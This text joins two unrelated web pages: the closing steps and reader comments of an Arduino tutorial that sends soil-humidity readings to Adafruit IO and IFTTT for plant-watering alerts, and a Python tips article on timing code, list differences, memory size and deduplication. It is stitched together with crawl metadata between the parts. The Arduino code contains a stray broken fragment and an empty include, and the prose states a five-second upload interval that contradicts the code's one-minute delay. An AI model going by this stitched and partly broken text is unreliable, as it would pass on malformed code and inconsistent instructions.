Measure the sensor reading of the plant when it needs watering; then, water your plant. Measure the sensor value post-watering.
Because different plants have different needs, there's no universal humidity value we can use to alert on. You might want to take measurements over a series of days to determine which humidity values indicate that your plant needs watering.
Make a note of where you want to set the alert threshold for your plant - we'll need it later.
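One way to turn that threshold into code is a small helper you can drop into the sketch later. This is a minimal sketch; dryVal, wetVal, and the 30% cutoff are example values standing in for your own calibration numbers:

```cpp
// Calibration values from Step 7 (replace with your own readings).
const int dryVal = 567;
const int wetVal = 367;

// Alert when relative humidity drops below this percentage (assumed example).
const int alertPercent = 30;

// Map a raw sensor reading to 0-100% and compare against the threshold.
bool needsWater(int sensorVal) {
  int humidity = 100 * (dryVal - sensorVal) / (dryVal - wetVal);
  return humidity < alertPercent;
}
```

With the example calibration, a reading of 520 maps to 23% humidity (alert), while 400 maps to 83% (no alert).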
Step 9: Make an Account on Adafruit IO and Note Your Credentials
We'll be using Adafruit.io to record our plant's humidity data. Make an account on.
You'll then need to find the following information:
- your adafruit.io username: you can find this from the URL, which should look like
- your adafruit.io key: from your dashboard, click on the key icon
Step 10: Connect to Adafruit IO
Now we need to modify our code to send data to Adafruit.
This is largely taken from Adafruit's tutorial. It's almost entirely boilerplate, but what this code does is:
- connect to your WiFi network
- connect to Adafruit via WiFi
- read data from your soil sensor
- upload sensor data to Adafruit
You will need to change the following variables in the code:
- WLAN_SSID - this is the name of your WiFi network
- WLAN_PASS - this is the password to your WiFi network
- AIO_USERNAME - this is your adafruit.io username
- AIO_KEY - this is your adafruit.io key
- dryVal - from your previous code
- wetVal - from your previous code
// Libraries
#include #include "Adafruit_MQTT.h" #include "Adafruit_MQTT_Client.h"
// WiFi parameters #define WLAN_SSID "YOUR WIFI HERE" #define WLAN_PASS "YOUR WIFI PASSWORD"
// Adafruit IO #define AIO_SERVER "io.adafruit.com" #define AIO_SERVERPORT 1883 #define AIO_USERNAME "YOUR USERNAME" #define AIO_KEY "YOUR KEY"
int inputPin = A0;
// CHANGE THESE BASED ON YOUR SENSOR READINGS const int dryVal = 567; const int wetVal = 367;
// Functions void connect(); int readHumidity();
WiFiClient client; Adafruit_MQTT_Client mqtt(&client, AIO_SERVER, AIO_SERVERPORT, AIO_USERNAME, AIO_KEY);
/****************************** Feeds ***************************************
/ Setup feeds for temperature & humidity Adafruit_MQTT_Publish humidity = Adafruit_MQTT_Publish(&mqtt, AIO_USERNAME "/feeds/humidity");
/*************************** Sketch Code ************************************/
void setup() { Serial.begin(115200); Serial.println(F("Adafruit IO Example"));
// Connect to WiFi access point. Serial.println(); Serial.println(); delay(10); Serial.print(F("Connecting to ")); Serial.println(WLAN_SSID);
WiFi.begin(WLAN_SSID, WLAN_PASS); while (WiFi.status() != WL_CONNECTED) { delay(500); Serial.print(F(".")); } Serial.println();
Serial.println(F("WiFi connected")); Serial.println(F("IP address: ")); Serial.println(WiFi.localIP());
// connect to adafruit io connect(); }
void loop() { // ping adafruit io a few times to make sure we remain connected if(! mqtt.ping(3)) { // reconnect to adafruit io if(! mqtt.connected()) connect(); }
// Grab the current state of the sensor int humidity_data = readHumidity();
// Publish data if (!humidity.publish(humidity_data)) { Serial.println(F("Failed to publish humidity")); } else { Serial.print(F("Humidity published: ")); Serial.println(humidity_data); }
// Repeat every minute delay(60000);
}
int readHumidity() { int sensorVal = analogRead(inputPin); return (int)(100*(dryVal-sensorVal)/(dryVal-wetVal)); }
//!"));
}
Step 11: Check That the Data Upload Is Working
After you run the sketch from the previous step, if you check your humidity feed from the adafruit.io interface, you should see data appear!
By default, the code from the previous step uploads new data every five seconds, which is probably overkill. Feel free to adjust this to something more sensible once you've confirmed that your code is working.
Step 12: Connect Adafruit IO to IFTTT
IFTTT (If This, Then That) is a wonderful, free service that lets you connect things together. And Adafruit.io has IFTTT integration! We're going to create an IFTTT applet: if our humidity feed on Adafruit.io is <5, then send a text message.
If you don't already have an IFTTT account, create one:
Then, create a new "applet." Click on the "this", search for Adafruit, and then select "Monitor a feed on Adafruit IO".
For the "that" portion, you can either set up notifications via the IFTTT application, or text messages, or email, or...you get the idea. Give it a try!
Step 13: Keep Your Plant Alive
Now you should receive push notifications when your plant is in need of watering.
This is just a prototype, of course. If you want to set up a robust system that will run with minimal intervention for months or years at a time, you'll want to think about power supplies, transferring your circuit from a breadboard to something more permanent, waterproof enclosures, etc. But this should get you started.
Good luck keeping your plants alive!
Recommendations
We have a be nice policy.
Please be positive and constructive.
11 Comments
which arduino version are you using for uploading the file, because i get an error at the begining, then I remove the "#include" and i get the second error
Great project, Bonnie! I bet the class it loads of fun, would love to TA next time. =]
Awesome project! Will the same code work on an Adafruit Feather M0 WiFi - ATSAMD21 + ATWINC1500?
I am not the author, I only answered a question, ask the author
sir what is the main purpose of this?
to get a text message informing you abt the humidity of the soil of yr plant
ahhh ,.sir? can i used this for my proposal ?i am 3rd year student taking up BS-ELECTRONICS if its ok to you?:)
The license on this Instructable is here:
It is not mine to say, I did not write the instructable.
you have to ask the author
Well done. just a tio.. after installing a library through library manager, I understand it is not necessary to restart the IDE
Very cool feature for plants! | http://www.instructables.com/id/Internet-of-Dirt-a-Texting-Plant/ | CC-MAIN-2018-26 | refinedweb | 1,841 | 65.32 |
Java Programming Tips, Articles and Notes
Java Programming Language simple tips to use Java effectively
This section is not very structured and discussing the random topics of the
Java Programming Language and which is useful in learning the Java Language.
Java Programming
Interview Tips - Java Interview Questions
Interview Tips Hi,
I am looking for a job in java/j2ee.plz give me interview tips. i mean topics which i should be strong and how to prepare. Looking for a job 3.5yrs experience
GRADIENT BACKGROUND
GRADIENT BACKGROUND How to set gradient colors a s background for a jframe? pls help me..............
Javascript background color - Java Beginners
Javascript background color Hi
How to compare background color...; Hi Friend,
If you want to change the background color of the textbox, try the following code:
Change background Color
function check
adding background image - Java Beginners
adding background image how do i add background image to this code... = new JTextField ("");
int average;
JPanel background = new JPanel...);
background.add(text11);
getContentPane().add(background
Jbutton[] background & foregroundcolor change
Jbutton[] background & foregroundcolor change how to change the color of the selected JButton in java swing.
I am create JButton in an array... foreground and background color is changed. the remaining jbutton foreground... color) to set the background color of that chunk. Here
we pass
How to set the Gradient Color as a background color for Java Frame?
How to set the Gradient Color as a background color for Java Frame? How to set the Gradient Color as a background color for Java Frame
how to create menubar and the below background color/image in java swing
how to create menubar and the below background color/image in java swing how to create menubar and the below background color/image in java swing
How to set background of an excel sheet using POI - Java Magazine
How to set background of an excel sheet using POI Hi,
i am trying to format the excel using java. How to set the background color of an excel...,
koushil Nath. Hi friend,
To set the background color of excel
Tips & Tricks
Tips & Tricks
Here are some basic implementations of java language, which you would... screen button on the keyboard, same way we can do it through java programming
How I can Set Transparent Background Image to Panel - Java Beginners
How I can Set Transparent Background Image to Panel Sir ,How I can Set Transperent Background Image to Jpanel.
plz Help
Tips & Tricks
Tips & Tricks
Splash
Screen in Java 6.0
Splash screens... of the application. AWT/Swing can be used to create splash screens in Java. Prior to Java SE
Change Background Picture of Slide Using Java
Change Background Picture of Slide Using Java
...;
In this example we are going to create a slide then change background picture of the
slide... to set this picture as background. To set picture as background of slide
we
How to Set Transperent Background Image to Jpanel - Java Beginners
How to Set Transperent Background Image to Jpanel Sir ,How to set Background Image to Jpanel. Hi Friend,
Try the following code:
import java.awt.*;
import java.awt.event.*;
import javax.swing.*;
public
how to color the Eclipse editor background programmatically?
how to color the Eclipse editor background programmatically? I have to color specific portion(background) of the of the Eclipse editor by running the java programm and provided that do the coloring from a given line number
Change Background of Master Slide Using Java
Change Background of Master Slide Using Java
... to create a slide then change background of the
master slide.
In this example we... constructor. Then we are creating fill for setting
background and for adding
Tips and Tricks
Tips and Tricks
Send
data from database in PDF file as servlet response... is a java library containing classes to generate documents in PDF, XML, HTML, and RTF
Add color to background but I can't labels or textfields
Add color to background but I can't labels or textfields Please help... JTextField(10);
con.add(l1);
con.add(tf1);
I am very new to Java, I...);
//tf1.setVisible(true)
}");
It has white background now instead of Maroon
Tips 'n' Tricks
Tips 'n' Tricks
Download files data from many
URLs
This Java program... arguments separated by space. Java provides
URLConnection class that represents
Change Background color using Custom Tag
Change Background color using Custom Tag
In this program, We will create a Custom Tag which changes the background
color.
JSP Custom Tags :
Provide... in a JSP application.
Provide simplicity and reusability of Java
java
: what is meant by constructor?
A java constructor
Dojo Tool tips
Dojo Tool tips
In this section, you will learn about the tool tips and how to developed it
in dojo.
Tool tips : This is a GUI
java
java what is ment by daemon
Java Daemon Threads
Daemon threads are like a service providers for other threads or objects running in the same process as the daemon thread. Daemon threads are used for background
java
java What is a daemon thread? Daemon threads are used for background supporting tasks and are only needed while normal threads... ground doing the garbage collection operation for the java run time system
Linux tutorials and tips
Linux is of the most advanced operating system. Linux is being used to host websites and web applications. Linux also provide support for Java and other programming language. Programmers from all the over the world is developing many
java - Java Beginners
the following links:
JAVA
JAVA sir" HOW TO DISPLAY TEXT FIELD IN A BACKGROUND IMAGE AT THE RUN TIME EITHER USING SWING OR APPLET IN JAVA BUT NOT AS JAVA SCRIPT"
Thanks
sowmiya.R
Here is a java swing code that displays background image
Java
" border="1" style="background-color: #ffffcc" align="center">
<TR>...="javascript:window.location='editData.jsp';" style="background-color:#49743D...:window.location='deleteData.jsp';"style="background-color:#ff0000;font-weight:bold
java
");
%>
<TABLE cellpadding="15" border="1" style="background-color: #ffffcc... language="java" import="java.util.*"%>
<%
int id = (Integer...;%@page language="java" import="java.util.*" %>
<form method="post" action
java
/TR/html4/loose.dtd">
<%@ page language="java" import="java.sql.*"%>
<title>...="background-color:#EDF6EA;border:1px solid #000000;">
<tr><td...;<input type="submit" name="Submit" value="Save" style="background-color
java - Java Interview Questions
Friend,
Please visit the following links:
java - Java Beginners
java HOW AND WHERE SHOULD I USE A CONSTRUCTOR IN JAVA PROGRAMMING...://
Thanks
java core collection - Java Interview Questions
java core collection why program in collection package throw two warnings(notes
java - Java Beginners
the following links:... output. Therefore in Java suggest how to accept input from the user and display
FullTrim in java - Java Beginners
FullTrim in java Hi ,
I want to know whether triming an array(fulltrim in ibm Lotus notes)is possible in java.
Ex: if array a[5] has only 3 values and the rest of the elements are null,then the full trim function should
Java code - Java Beginners
Java code how to make a program in java(Jbutton) if there is a combination numbers inorder to exit the program else the background color of the frame will turns red
java - Java Beginners
java write a programme to implement linked list using list interface Hi Friend,
Please visit the following link to learn about the implementation of LinkedList .
java - Java Beginners
Search:
b)Binary Search:
Along
Swing In Java
Swing In Java
In this tutorial we will read about the various aspects of Swing... Java Foundation Classes. JFC
covers the group of features that allows... for Java applications. In
early days Netscape Communications Corporation
java - Java Beginners
links:
Thanks
What is Java - Java Beginners
What is Java What is Java and how a fresher can learn it fast? Can any one share the fastest learning tips for Java Programming language? Thanks! Hi,Java is one of the most popular programming language. You can learn
background
background how to add image as background to a frame
java programming problem - Java Beginners
/java/java-tips/data/strings/96string_examples/example_count.shtml
http.../java-tips/data/strings/96string_examples/example_countVowels.shtml
follow...java programming problem Hello..could you please tell me how can I
java code - Java Beginners
java code plese provide code for the fallowing task
Write a small record management application for a school. Tasks will be Add Record, Edit...), Age, Notes(No Maximum Limit)
No database should be used. All data must
java - Java Beginners
://
Thanks
RoseIndia Team...java Java always provides default constructor to ac lass is it true... constructor.If we don't create any constructor for a class java itself creates
Lotus notes - Hibernate
Lotus notes In Lotus notes to csv file conversion--> can we use two delimiters?
like
java reminder Application
java reminder Application Create an awt application which imitates a reminder application,that stores notes and specify date and time to be reminded
EJB,java beans
EJB,java beans What is EJB poles,mainfest,jar files?
What is nongraphical bean?
Please send me as notes
java script
java script when you click a button how will you change the background color of a web page
java
java diff bt core java and java
how to improve knowledge in java
how to improve knowledge in java netbeans
Please visit the following link:
java
java what is java
java swings - Java Beginners
java swings Hi,
I need the code for how can i set the joptionpane color(background and foreground).
can i set the delay time for joptionpane display.
Please send the code .its urgent.
Thanks,
Valarmathi project
java project i would like to get an idea of how to do a project by doing a project(hospital management) in java.so could you please provide me with tips,UML,source code,or links of already completed project with documentation
developing skills in java , j2ee - Java Beginners
developing skills in java , j2ee How to understand or to feel the flow of java or j2ee programme what is the way to become a expert programmer can you please give me tips
thanking you
Java - Java Beginners
://... void main(String args[]) {
File f1 = new File("/tmp/java");
File f11
Java programming 1 - Java Beginners
:// programming 1 Thx sir for reply me ^^ err how bout if using scanner class or further method to solve that code? instead of using array?
Advertisements
If you enjoyed this post then why not add us on Google+? Add us to your Circles | http://www.roseindia.net/tutorialhelp/comment/68090 | CC-MAIN-2016-07 | refinedweb | 1,739 | 53 |
Created on 2017-06-15 15:27 by rthr, last changed 2017-06-15 16:06 by rthr.
Here is the example code I am running:
```
import asyncio
class it:
async def __aenter__(self):
return self
async def __aexit__(self, *_):
print('EXIT')
async def main():
async with it():
await asyncio.sleep(100)
asyncio.get_event_loop().run_until_complete(main())
```
When this gets interrupted by a SIGINT, I would expect this code to display `EXIT` before the `KeyboardInterrupt` stacktrace. But instead the `__aexit__` function is simply not called.
Yes, this is a known limitation of asyncio -- keyboardinterrupt exceptions kills the loop rather abruptly. One way to handle this is to use 'signal.signal' for sigint to raise custom exception instead of keyboardinterrupt.
Ok, thank you. I'm guessing the patch I proposed in the PR is not an option, for my curiosity, why is that? | https://bugs.python.org/issue30679 | CC-MAIN-2018-05 | refinedweb | 142 | 65.73 |
Xlsxwriter is a python module through which we can write data to Excel 2007+ XLSX file format. In this blog post we learn to write data, insert images and draw graphs in the excel file.
To write data into excel file first we need to create a file and add a sheet to the file. By default the names of the sheets will be Sheet1, Sheet2 and etc., or we can create sheets with our own names.
import xlsxwriter # Create an new Excel file and add a worksheet. workbook = xlsxwriter.Workbook('test.xlsx') worksheet = workbook.add_worksheet() # Sheet1 worksheet = workbook.add_worksheet(‘WorkLog’) # WorkLog
In the above snippet we are create an excel file with name test.xlsx and add two sheets to the file as ‘Sheet1’ and ‘WorkLog’
Now we can write the data to the excel sheet with in two ways using write(), one way is write(row, column, data) where row is the row number and column is the column number and data is the data that we need to write into the file. Second way is to write the into the cell name directly
worksheet.write(0, 0, ‘MicroPyramid’) worksheet.write(‘A1’, ‘MicroPyramid’)
The above snippet will write the data in the first cell of the sheet. In the similar way we can write data into other cells by finding the row and column numbers.
We can insert image into the excel sheet with insert_image() function. We can also set the height and width of the images in the excel sheet by setting the width and height of the cell where the image is going to be inserted.
worksheet.insert_image('B5', 'logo.png') worksheet.insert_image(2, 4', 'logo.png')
We can also draw charts in the excel sheets. We can draw Bar and line charts in the excel sheet using xlsxwriter module using add_chart() method
chart = workbook.add_chart({'type': 'column'}) # Write some data to add to plot on the chart. data = [ [5, 10, 15, 20, 25], ] worksheet.write_column('A1', data[0]) # Configure the charts. In simplest case we just add some data series. chart.add_series({'values': '=Sheet1!$A$1:$A$5'}) # Insert the chart into the worksheet. worksheet.insert_chart('A7', chart) workbook.close()
Here ‘type’ can be of any thing in ‘bar’ or ‘column’ or anything.
UPDATE: we recently found amonther blog post useful to work on excel with python... | https://micropyramid.com/blog/create-excel-file-in-python-and-insert-image-and-draw-bar-graphs-using-python-xlsxwriter/ | CC-MAIN-2019-51 | refinedweb | 392 | 74.9 |
Evgeny Shvarov 24 January 2018Code snippet, Coding Guidelines, ObjectScript, Caché, InterSystems IRIS?
For one-line if I prefer postconditionals:
As for For - the option with braces. It's more readable. And one line inside For loop quickly and often becomes several lines, so braces become mandatory anyway.
But...
Can one condition in "postconditionals" "quickly and often" convert into several lines?
Maybe postconditionals shoud be If with braces too?
Postconditionals are to be used only for the most simple checks, for example:
instead of
But several conditions (or several lines inside) should be as if, I agree.
for several conditions there's always $S too.
I tend to use "if" rather than postconditionals because it makes the code read more like spoken language, and I think it's easier to understand for those who are not seasoned Caché veterans.
However I make exceptions for "quit" and "continue":
quit:$$$ISERR(tSC)
continue:x'=y
I like to have these out in front, rather than buried in a line somewhere, so that when I'm scanning code I can easily see "this is where the execution will branch if a certain condition is met."
I also like this style, as it helps me spot the lines where execution at the current level might terminate.
Yep, brace always.
Because you will never know if you need to update your condition or chain another. The brace shows what is the scope of the condition, also for loops, for, for each, etc.
It is a good practices and it is more readable.
As Eduard Lebedyuk has commented, a single IF for use to set a variable, the postconditionals is a good idea, coz you know the condition before to set.
Agreed, and if you want to have your cake and eat it, too:
Brace always for me too, unless I am writing some quick debugging code or something along those lines
Agree with brace always. This really helps with new developers as the syntax is something they've seen before in other languages.
Postcondition is preferred
especially
quit:erroror
continue:ignore
for i=1:1:5 write i," "is as fine as
for i=1:1:5 { write i," " } write "end"
but this is really bad:
f i=1:1:5 d w "? "
.w i," "
w "end"
OMG!!! What is that!!!
It seems a KGB spy code !!!
I think they named it M(umps)
Besides all that is mentioned, the If without braces has a side-effect that the If with braces does not have : it affects the system variable $Test.
Not important, only if you use the ELSE (legacy) command...
Indeed... the brace delimits the scope of the operation
Thanks, Danny!
Is there any "non-legacy" case when $test can be useful?
I mean, should we consider using $test in a code as a bad practice?
If you want to check on the result of a LOCK command for example
LOCK +<SOMERESOURCE>:<timeout>
IF $T {do something}
So I wouldn't call it bad practice just yet.
Yes, same here, i also use following code a lot:
Open <some device>:"R":0 Else Write "could not open device" Quit
I always use Else on the same line just after the command that changes $test,
having too much instructions between them creates problems.
Oh right, forgot about that.
I would do it this way to avoid Else:
Open <some device>:"R":0 If '$test { Write "could not open device" Quit }
C'mon, let's stop mentioning old features like argumentless Do and legacy ELSE
There's just no point in doing so.
In the real world, there are lots of programs still using this style, every developer using Caché Object Script should be able to read this and understand the side-effects, pitfalls, even if we recommend to not use it anymore...
totally right!!
there is more old code out than you could / would like to imagine
And Caché is backward compatible for 40 years (since DSM V1)
New developers should not write it. But they need to understand it. Or at least recognize it.
It's pretty similar to reading the bible in original language with no translation.
Danny and Robert, of course I understand what you are saying (we are the same generation!). Also, I am not trying to be the Developer Community police.
In posts that are asking "what's the recommended way to do this?" we should answer that question. There's no point in mentioning old syntax in that context. Saying "don't do this, but you might see it someday" helps the subset of people that might work with old code, but doesn't help and may confuse the people that are working with new code. It doesn't belong.
On the other hand, if there's a post asking "what are some older/confusing syntaxes I might encounter when working with M or ObjectScript?" we should answer that question. We all have examples of that.
I wonder if it would be possible to have a more rigid syntax check (now in Atelier / and switchable)
to enforce all kind of brackets (eg: condition like in JS).
I tried to recommend this while teaching COS myself.
With very limited success as some Dinos ignored it.
Everyday I read legacy code like this, but if we're talking about the ideal (like coding guidelines) we want to avoid these. I agree that every Object Script developer should be able to read this code, but they should also know that there are better modern ways to write this.
I think that part of growing the community of Object Script developers is to lower barriers to entry. Having worked with a lot of new Object Script developers (and been one myself), one of the largest barriers to entry is the prevalence of cryptic legacy syntax in existing code.
Remember, just because we can read it doesn't mean that everyone can.
Argumentless DO is still the simplest way to introduce a scope to NEW a variable, including $namespace or $roles. Yes, you can extract that out to another procedure or method, but I often prefer to do it inline.
Good point Jon. Here's a concrete example, taken from the CheckLinkAccess classmethod of %CSP.Portal.Utils (2017.2 version). I have done the macro expansion myself and highlighted the expansions:
Do
. New $roles
. Set $roles=""
. If ($extract($roles,1,$length("%All"))="%All") Set tHaveAllRole = 1
If tHaveAllRole {
...
Congratulations!
I new I had seen something similar
We want our code to be as accessible and readable as possible to as many people as possible. We always prefer whitespace formatting and curly brackets to arcane one line syntax. Someone who's not an Object Script expert will know what this does -
But there's no guarantee that a novice will necessarily know what these do -
Good code is readable and clever one liners will get in the way of that goal.
"We want our code to be as accessible and readable as possible to as many people as possible. "
Do we? ;)
"We always prefer whitespace formatting and curly brackets to arcane one line syntax." -- I don't ;)
Using arcane one liners shows that you are a superiour wizard. One should always use the short forms of commands to make code more terse and save space. If people want to read the code, they can use 'expand code' in studio (which expands the shortform commands to the full version).
Note, there might be some sarcasm in here.
People who know me, might also know that I'm only maybe 80% joking;)
you remind me the joke about hieroglyphs:
- What's wrong with them?
- Nothing! Priests in old Egypt were reading the "book of death" like you would read a newspaper.
- You just have to learn the 'encryption'.
The legacy versions of If and For commands don't use curly braces. But there are no legacy versions of While and Do/While, which require curly braces. So rather than trying to remember which commands use or don't use curly braces, just use curly braces all the time for these, as well as Try/Catch.
Regarding post-conditionals, it's a good habit to put parentheses around the condition, which allows you to put spaces in the condition.
This is valid syntax: set:a=4 y=10
This is valid syntax and more readable: set:(a = 4) y = 10
This is invalid syntax: set:a = 4 y = 10
I just went through the whole conversation on this and find it knowledgeable for me as i am beginner for cache. Now i am able to understand how to use them in with the standards and where i need to careful thanks for all.
Hi, colleagues!
The sense of the discussion I raised is to get Coding Guidelines for ObjectScript to let us cook the code which suits the goals and team guidelines the best.
Thanks for a lot of bright thoughts and true experience!
If I am modifying a routine I didn't originally write then I tend to stick to the coding style the original author adopted - even it is using legacy syntax. It is good practice not to mix old and new constructs within the same code block ie. don't mix curly braces with line-oriented syntax. If you are completely re-writing something or writing new code then I prefer curly braces.
I would have liked to re-factor some of my code better but I found the 'use for' construct breaks when you try that. In this pseudocode, I was using the 'write' statement to write to a file on the file system. There is a condition that is checked to determine whether it gets written to file1 or file2.
for arrayIndex=1:1:arrayOfIds.Count()
continue:errorStatus'=1
use file1 for testIndex=1:1:testSetObj.TestCollection.Count()
use file2 for testIndex=1:1:testSetObj.TestCollection.Count()
I miss 3 things in this example:
New file. If the specified file does not exist, the system creates the file. If the specified file already exists, the system creates a new one with the same name. The status of the old file depends on which operating system you are using. On UNIX® and Windows, Caché deletes the old file. (Note that file locking should be used to prevent two concurrent processes using this parameter from overwriting the same file.)
So to get all output you may append arrayIndex to filename to have unique file names
Thanks for the comments Robert. It's safe to assume there is an IF statement in each inner-for to determine whether to do anything or not. Each object in arrayOfIds needs to be opened and a Boolean check is done against a property. I haven't had a problem with the 'N' parameter. The code appears to store 'write' records in process memory before writing everything to file after the outer-for. $ZSTORAGE has been buffed to accommodate this.
Unique file names have been achieved using the following assumptions:
1) The process will run no more than once a day
2) Append today's date in ODBC format using $zd(+$h,3) to the end of the filename.
The 'close' statement appears after the outer-for but I'm not sure if the curly braces implicitly does it anyway.
Thanks for the clarification.
It's sometimes hard to guess the picture if you miss some pixels.
I'd still recommend moving the CLOSE after each inner loop to have OPEN / CLOSE strictly paired
The implicit CLOSE happens only if you exit the partition. There's no class to act undercover.
Curly braces just structure the code with no operational side effect.
It's already 256Mb, since 2012.2
Strange. Our production servers are Caché 2018 on AIX but still showing only 16,384 KB.
Must have preserved the existing setting on upgrades rather than use the new value.
Fresh local Caché install on Windows install shows 256MB though.
Cache for UNIX (IBM AIX for System Power System-64) 2018.1.2 (Build 309_5) Wed Jun 12 2019 20:08:03 EDT
%SYS>w $zs
16384
Which part of it?
There's like 5 different suggestions contradicting each other.
None of them. The best practices is "Do what you want"... hehe
Now seriously. I think the best practices is use according to the explication of each comment. Use brace to delimit the scope, not use if you have one line and precondition, etc..
The conversation is helpful.
Ok, this is fair - we can remove the Best Practice tag for this.
The idea was that this is important conversation if you consider internal guidelines on this for your organization and can take one approach from the best practices of experienced developers.
I think it is a "Best practice", but the information is scattered throughout the conversation.
Why not create a last comment with a brief of the conversation, with pros and cons?
It could be more clear.
Regards | https://community.intersystems.com/post/and-if-one-line-brace-or-not-brace | CC-MAIN-2020-05 | refinedweb | 2,166 | 71.85 |
```yaml
modules:
    config:
        Db:
            dsn: 'PDO DSN HERE'
            user: 'root'
            password:
```
The Db module can clean up the database between tests by loading a database dump. This can be done by parsing the SQL file and executing its commands using the current connection:
```yaml
modules:
    config:
        Db:
            dsn: 'PDO DSN HERE'
            user: 'root'
            password:
            dump: tests/_data/your-dump-name.sql
            cleanup: true # reload dump between tests
            populate: true # load dump before all tests
```
Alternatively, an external tool (like the mysql client or pg_restore) can be used. This approach is faster and won't produce parsing errors while loading a dump. Use the `populator` config option to specify the command. For MySQL it can look like this:
modules: enabled: - Db: dsn: 'mysql:host=localhost;dbname=testdb' user: 'root' password: '' cleanup: true # run populator before each test populate: true # run populator before all test populator: 'mysql -u $user $dbname < tests/_data/dump.sql'
See the Db module reference for more examples.
To ensure database dump is loaded before all tests add
populate: true. To clean current database and reload dump between tests use
cleanup: true..
The Db module provides actions to create and verify data inside a database.
If you want to create a special database record for one test, you can use
haveInDatabase method of
Db module:
<]);
Laravel5 module provides the method
have which uses the factory method to generate models with fake data.
If you want to use ORM for integration testing only, you should enable the framework module with only the
ORM part enabled:
modules: enabled: - Laravel5: - part: ORM
modules: enabled: - Yii2: - part: ORM
This way no web actions will be added to
$I object.):
modules: enabled: - Symfony - Doctrine2: depends: Symfony
modules: enabled: - ZF2 - Doctrine2: depends: ZF2
If no framework is used with Doctrine you should provide the
connection_callback option with a valid callback to a function which returns an
EntityManager instance.
Doctrine2 also provides methods to create and check data:
haveInRepository
grabFromRepository
grabEntities.
What if you deal with data which you don’t own? For instance, the page look depends on number of categories in database, and categories are set by admin user. How would you test that the page is still valid?
There is a way to get it tested as well. Codeception allows you take a snapshot of a data on first run and compare with on next executions. This principle is so general that it can work for testing APIs, items on a web page, etc.
Let’s check that list of categories on a page is the same it was before.
Create a snapshot class:
vendor/bin/codecept g:snapshot Categories
Inject an actor class via constructor and implement
fetchData method which should return a data set from a test.
<?php namespace Snapshot; class Categories extends \Codeception\Snapshot { /** @var \AcceptanceTester */ protected $i; public function __construct(\AcceptanceTester $I) { $this->i = $I; } protected function fetchData() { // fetch texts from all 'a.category' elements on a page return $this->i->grabMultiple('a.category'); } }
Inside a test you can inject the snapshot class and call
assert method on it:
<?php public function testCategoriesAreTheSame(\AcceptanceTester $I, \Snapshot\Categories $snapshot) { $I->amOnPage('/categories'); // if previously saved array of users does not match current set, test will fail // to update data in snapshot run test with --debug flag $snapshot->assert(); }
On the first run, data will be obtained via
fetchData method and saved to
tests/_data directory in json format. On next execution the obtained data will be compared with previously saved snapshot.
To update a snapshot with a new data run tests in
--debugmode.
By default Snapshot uses
assertEquals assertion, however this can be customized by overriding
assertData method.
The assertion performed by
assertData will not display the typical diff output from
assertEquals or any customized failed assertion. To have the diff displayed when running tests, you can call the snapshot method
shouldShowDiffOnFail:
<?php public function testCategoriesAreTheSame(\AcceptanceTester $I, \Snapshot\Categories $snapshot) { $I->amOnPage('/categories'); // I want to see the diff in case the snapshot data changes $snapshot->shouldShowDiffOnFail(); $snapshot->assert(); }
If ever needed, the diff output can also be omitted by calling
shouldShowDiffOnFail(false).
By default, all snapshot files are stored in json format, so if you have to work with different formats, neither the diff output or the snapshot file data will be helpful. To fix this, you can call the snapshot method
shouldSaveAsJson(false) and set the file extension by calling
setSnapshotFileExtension():
<?php public function testCategoriesAreTheSame(\AcceptanceTester $I, \Snapshot\Categories $snapshot) { // I fetch an HTML page $I->amOnPage('/categories.html'); // I want to see the diff in case the snapshot data changes $snapshot->shouldSaveAsJson(false); $snapshot->setSnapshotFileExtension('html'); $snapshot->assert(); }
The snapshot file will be stored without encoding it to json format, and with the
.html extension.
Beware that this option will not perform any changes in the data returned by
fetchData, and store it as it.
© 2011 Michael Bodnarchuk and contributors
Licensed under the MIT License. | https://docs.w3cub.com/codeception/09-data | CC-MAIN-2021-10 | refinedweb | 811 | 51.18 |
Improve your Python with our efficient tips and tricks.
You can Practice tricks using Online Code Editor
Tip and Trick 1: How to measure the time elapsed to execute your code in Python
Let’s say you want to calculate the time taken to complete the execution of your code. Using a time module, You can calculate the time taken to execute your code.
import time startTime = time.time() # write your code or functions calls endTime = time.time() totalTime = endTime - startTime print("Total time required to execute code is= ", totalTime)
Tip and Trick 2: Get the difference between the two Lists
Let’s say you have the following two lists.
list1 = ['Scott', 'Eric', 'Kelly', 'Emma', 'Smith'] list2 = ['Scott', 'Eric', 'Kelly']
If you want to create a third list from the first list which isn’t present in the second list. So you want output like this
list3 = [ 'Emma', 'Smith]
Let see the best way to do this without looping and checking. To get all the differences you have to use the set’s symmetric_difference operation.
list1 = ['Scott', 'Eric', 'Kelly', 'Emma', 'Smith'] list2 = ['Scott', 'Eric', 'Kelly'] set1 = set(list1) set2 = set(list2) list3 = list(set1.symmetric_difference(set2)) print(list3)
Tip and Trick 3: Calculate memory is being used by an object in Python
whenever you use any data structure(such as a list or dictionary or any object) to store values or records.
It is good practice to check how much memory your data structure uses.
Use the
sys.getsizeof function defined in the sys module to get the memory used by built-in objects.
sys.getsizeof(object[, default]) return the size of an object in bytes.
import sys list1 = ['Scott', 'Eric', 'Kelly', 'Emma', 'Smith'] print("size of list = ",sys.getsizeof(list1)) name = 'pynative.com' print("size of name = ",sys.getsizeof(name))
Output:
('size of list = ', 112) ('size of name = ', 49)
Note: The sys.getsizeof doesn’t return the correct value for third-party objects or user defines objects.
Tip and Trick)
Output:
'Original= ', [20, 22, 24, 26, 28, 28, 20, 30, 24] 'After removing duplicate= ', [20, 22, 24, 26, 28, 30]
Tip and Trick 5: Find if all elements in a list are identical
Count the occurrence of a first element. If it is the same as the length of a list then it is clear that all elements are the same.
listOne = [20, 20, 20, 20] print("All element are duplicate in listOne", listOne.count(listOne[0]) == len(listOne)) listTwo = [20, 20, 20, 50] print("All element are duplicate in listTwo", listTwo.count(listTwo[0]) == len(listTwo))
Output:
'All element are duplicate in listOne', True 'All element are duplicate in listTwo', False
Tip and Trick 6: How to efficiently compare two unordered lists
Let say you have two lists that contain the same elements but elements order is different in both the list. For example,
one = [33, 22, 11, 44, 55] two = [22, 11, 44, 55, 33]
The))
Output:
'is two list areb equal', True
Tip and Trick 7: How to check if all elements in a list are unique
Let say you want to check if the list contains all unique elements or not.
def isUnique(item): tempSet = set() return not any(i in tempSet or tempSet.add(i) for i in item) listOne = [123, 345, 456, 23, 567] print("All List elemtnts are Unique ", isUnique(listOne)) listTwo = [123, 345, 567, 23, 567] print("All List elemtnts are Unique ", isUnique(listTwo))
Output:
All List elemtnts are Unique True All List elemtnts are Unique False
Tip and Trick 8: Convert Byte to String
To convert the byte to string we can decode the bytes object to produce a string. You can decode in the charset you want.
